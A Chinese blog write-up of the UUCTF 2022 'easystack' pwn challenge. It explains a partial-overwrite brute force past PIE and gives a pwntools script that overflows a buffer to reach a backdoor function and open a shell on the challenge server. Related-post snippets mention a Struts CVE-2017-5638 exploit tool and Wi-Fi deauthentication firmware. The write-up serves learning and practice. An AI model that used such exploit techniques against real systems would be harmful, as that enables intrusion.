【pwn】[UUCTF 2022 新生赛]easystack --pie爆破

最新推荐文章于 2023-12-01 00:02:06 发布
最新推荐文章于 2023-12-01 00:02:06 发布
阅读量272 收藏 1
点赞数
文章标签: java 开发语言 python 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/134366003
版权

查看程序保护

发现开了pie:

partial write(部分写入)就是一种利用PIE技术缺陷的bypass技术。由于内存的页载入机制,PIE的随机化只能影响到单个内存页。通常来说,一个内存页大小为0x1000,这就意味着不管地址怎么变,某条指令的后12位,3个十六进制数的地址是始终不变的。因此通过覆盖EIP的后8或16位 (按字节写入,每字节8位)就可以快速爆破或者直接劫持EIP

简单来说就是后12位是不会被随机化的,接着看代码逻辑

发现有个后门的函数

可以getshell,但是问题是怎么溢出到这里,vuln函数的buf偏移是0x100,加上8个字节的覆盖rbp,那这个read函数只有2个字节可以利用,考虑低位绕过。看一下汇编

vuln函数:

main函数:

因为开了pie的缘故,导致后12位跟上图的一样,前面的字节全部随机化,我们现在可以将地址后12位覆盖成我们backdoor函数的偏移0x185,一个字节八位,我们还需要后面四位是什么,才能构造成16位(2个字节),后四位我们需要爆破

爆破脚本如下:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node5.anna.nssctf.cn",28309)

for num in range(15):

    io=remote("node5.anna.nssctf.cn",28309)

    io.recvuntil(b"What's your name?\n")

    num=num<<0xc   #左移12位,因为要爆破后四位

    payload=b'a'*0x100+b'a'*0x8+p16(0x185+num)

    io.send(payload)

    if b"You are born to pwn!" in io.recv():

        io.interactive()

    io.close()    

GGb0mb
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2019.11.6 unctf 的pwn题——简单绕过pie
DSR446的博客
11-06 2775
这篇安全客关于pie和bapass绕过写的蛮好的! 看到函数最后返回到v1(),而且上一个函数的开辟的空间比后一个函数开辟的函数大,我们想到可以在前一个函数中提早将后门函数布置好,因为弹栈并不会是栈中的数据变化,除非往栈中写数据。 我们现在就通过gdb我们需要往栈的拿个位置写后门函数。 我们可以看见第一个数组的位置和后面 的v2()之间隔了0xc个字节。还有需要注意的是程序是将一个函数...
【八芒星计划】pwn python PIE爆破脚本绕过ASLR 覆盖后几位
carol2358的博客
09-02 3468
from pwn import * from LibcSearcher import * import time local_file = './magic_number' local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so' select = 0 if select == 0: r = pro
【Web】UUCTF 2022 新生 个人复现
最新发布
uuzeray的博客
12-01 795
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。因此md5[0]应该传入%0a0e215962017,但是我们又多了一个%0a 换行符,通过上面这行代码 $md5[0]=substr($md5[0],$sub);$md5[1]===$guessmd5,后者是1秒一变的,得写脚本了。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
针对简单Pwn溢出题的爆破
Rog's Blog
04-19 963
爆破大法好 例子:BUUCTF rip 首先得到源程序pwn1 file pwn1 checksec pwn1 啥也没有,很好 然后拖到IDA64分析一波 发现漏洞函数,地址为 0x401186 ,很好 祭出脚本,开始爆破 from pwn import * def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
funcanary[CISCN2023初]-爆破canary+pie
qq_53928256的博客
05-29 691
根据PIE的保护的特性我们可以知道(请先进行PIE保护的相关学习),地址的后3位是不变的,所以只需要的原先返回地址的基础之上将返回地址的后三位覆盖位system(“/bin/cat flag”)函数调用的地址即可,即为修改为“0x231”(该地址只需要在IDA看偏移地址即可),根据“字符”查找到特殊的字符串“/bin/cat flag”,所以可能存在直接的system(“/bin/cat flag”)函数,通过追踪定位,发现确实存在相应函数。先检查文件的保护以及文件的类型,保护全开,64位程序。
[UUCTF 2022 新生]babystack WP
m0_74154810的博客
07-20 78
[UUCTF 2022 新生]babystack,简单栈溢出问题
[UNCTF 2020]Pwn方向
Nashi_Ko的博客
11-14 348
直接在linux使用指令nc 45.158.33.12 8000 from pwn import * io = remote('45.158.33.12',8000) payload = 'chcp 65001' io.sendline(payload) print(io.recv()) 运行脚本得到flag
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' 要求 Python2或Python3 要求 法律免责声明 该项目仅用
dictionary:来自pwn硬糖师傅的爆破字典
05-20
dictionary 来自pwn硬糖师傅的爆破字典 ---非最终版
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
UUCTF2022-Writeup
Ivyyyyyy1的博客
10-31 1332
UUCTF2022 Writeup
UUCTF WP
qq_64201116的博客
11-02 1498
/利用mail函数触发恶意函数,跳转至__attribute__ ((__constructor__))修饰的函数。mail触发恶意函数跳转至__attribute__ ((__constructor__))修饰的函数。$md5[1]的话看时间戳就可以了,可以写python发包,也可以直接卡时间戳手动发包。问了xiaoqiuxx师傅,原来是匹配头和尾也没有0e,用换行可以绕过。putenv("LD_PRELOAD=")的形式可以加载恶意动态库。
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 3704
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
湖湘杯pwn400的wp
一个码农的笔记
12-09 2006
湖湘杯的pwn很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7359
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值